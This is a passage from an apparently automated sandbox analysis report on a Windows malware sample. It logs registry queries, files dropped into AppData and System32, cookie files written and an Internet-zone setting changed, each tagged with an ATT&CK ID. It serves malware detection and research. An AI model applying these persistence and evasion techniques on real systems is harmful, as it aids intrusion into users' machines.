\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"ewiuer2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\version.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ui\\SwDRM.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\ewiuer2.exe\"\n \"ewiuer2.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\ke4kso93.txt\"\n \"ewiuer2.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\n1w0upwy.txt\"\n \"ewiuer2.exe\" writes file \"c:\\windows\\system32\\ewiuer2.exe\"\n \"ewiuer2.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\7w4oovro.txt\"\n \"ewiuer2.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\japozoo9.txt\"\n \"ewiuer2.exe\" writes file \"c:\\windows\\system32\\viesazm.mpk\"\n \"ewiuer2.exe\" writes file \"%appdata%\\ewiuer2.exe\"\n \"ewiuer2.exe\" writes file \"%appdata%\\microsoft\\windows\\cookies\\n1w0upwy.txt\"\n \"ewiuer2.exe\" writes file \"%appdata%\\microsoft\\windows\\cookies\\7w4oovro.txt\"\n \"ewiuer2.exe\" writes file \"%appdata%\\microsoft\\windows\\cookies\\japozoo9.txt\"\n \"ewiuer2.exe\" writes file \"%appdata%\\microsoft\\windows\\cookies\\ke4kso93.txt\"\n \"ewiuer2.exe\" writes file \"%windir%\\system32\\viesazm.mpk\"\n \"ewiuer2.exe\" writes file \"%windir%\\system32\\ewiuer2.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\viesazm.mpk\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip_{90A066FE-591C-47F3-850D-9644B684FBA5}\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip6_{AC07BF4D-B150-47EB-A71E-488912826651}\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip6_{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip6_{90A066FE-591C-47F3-850D-9644B684FBA5}\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe.Local\\\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\VIESAZM.MPK\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\EWIUER2.EXE.LOCAL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\viesazm.mpk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\ewiuer2.exe]- [targetUID: 00000000-00004444]\n \"EWIUER2.EXE.67A482B6.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"N1W0UPWY.txt\" has type \"ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N1W0UPWY.txt]- [targetUID: 00000000-00004444]\n \"7W4OOVRO.txt\" has type \"ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7W4OOVRO.txt]- [targetUID: 00000000-00004444]\n \"JAPOZOO9.txt\" has type \"ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JAPOZOO9.txt]- [targetUID: 00000000-00004444]\n \"KE4KSO93.txt\" has type \"ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KE4KSO93.txt]- [targetUID: 00000000-00003444]\n \"viesazm.mpk\" has type \"data\"- Location: [%WINDIR%\\System32\\viesazm.mpk]- [targetUID: 00000000-00005220]\n \"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\ewiuer2.exe]- [targetUID: 00000000-00004444]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ewiuer2.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\KE4KSO93.txt\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\N1W0UPWY.txt\"\n \"ewiuer2.exe\" touched file \"C:\\Windows\\System32\\ewiuer2.exe\"\n \"ewiuer2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"ewiuer2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"ewiuer2.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"ewiuer2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"ewiuer2.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\\KE4KSO93.txt\"\n \"ewiuer2.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\\N1W0UPWY.txt\"\n \"ewiuer2.exe\" touched file \"C:\\Windows\\System32\\viesazm.mpk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"ECC618E36C19C2986389DFD687EFB10CBFDE125CF66FEF09F7FAD4CBC63D7CDA\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"TASKHOST\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"TASKHOST\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"ewiuer2.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"ewiuer2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"ewiuer2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e0008332e0003332e00000000000000000000002a00000000013ccc120000000000a0d9120095e1147733f97600feffffff435c187750591877aa000000b800000002332e0000332e00c4cd1200fcd1120000000000000000000000000000000000000000000000000000000000000000001c5c177760d80f75ffffffff1700000074cd1200240000000300000064d2120090d71200fcd1120086000000a0cd120096ed18772a332e00a06aee7486000000c4cd1200fcd112000000000086008800a06aee74c4cd1200916cee742a332e00a06aee74a06aee7434d2120002020000 (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003168)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000cd750000000050011d000000000006c4cd75887d1f00781b200000000000020000000000000000000001781b2000100000000000010198d0120000000000c4ff120095e11477e8fc7600feffffffe06318771664187700000000887d1f000400cc0000000000887d1f00807d1f00acd11200f4c5097700001d0000000000887d1f00f8d112006321ce7500001d0000000000887d1f003cc9cd750000000000000000000400000200000000000000887d1f00943c7c77000000000400cc000000000000000000000000006455400032d51200f4d61200000400000000000000000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000001d0000000000c8be2200148812000464187738011d00e0631877f4667c770000000000001d00d0be22006dd1097798a332bb6caeb1750000000000000000e80100002328000bc4001d000100000000001d0050011d000c000000d0be22000000000002000000180000002c000000f0871200000000000000000003000000b48712003c6e1877000000000000000000000000c07b1f00c0751177c07b1f0000000000c0751177d087120079da0977000000000200000028881200dbd2097700000000e2d2097770ac32bb23280000ff2b187790667c770000000004021d00 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e63c0000008901f0f276013ce43c00ff2b187798e63c0095e11477c8fc7600feffffff435c18775059187734020000400200008a058901880589011000000080000000ff2b1877540b527720a3c16cac011d0000001d0001000000202b20000800d4000500000000d15f73ac011d0000001d00880589010900cf000500000005000000bcee1877d86f1d0000008901200000000a00ca0000000000d8d92200c86c1d00e86d1d00e81a230090711d000000890130e53c00d8d92200b0e63c0095e11477f0f27600feffffffff2b18779a2a187720a3c16c10a3c16c00000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d0016000000aa0000000000000000000000887a2400c86c1d00306e1d0068a72500e0781d007700690068c912007200320070d6120068a72500e9e9187768a7250000000000aa00000094ca1200ccce120000000000000000000000000000000000000000000000000000000000000000001c5c177760d80f75ffffffff1700000044ca1200240000000300000034cf120060d41200ccce12008600000070ca120096ed18778aa72500a06aee748600000094ca1200ccce12000000000086008800a06aee7494ca1200916cee748aa72500a06aee74a06aee7404cf120002020000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004ce1200000000003e00000054ce1200feffffffdccd1200cf001977d60019771cda7c773e0000001f00000054ce120000000000b0cd12000000000018ce1200 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 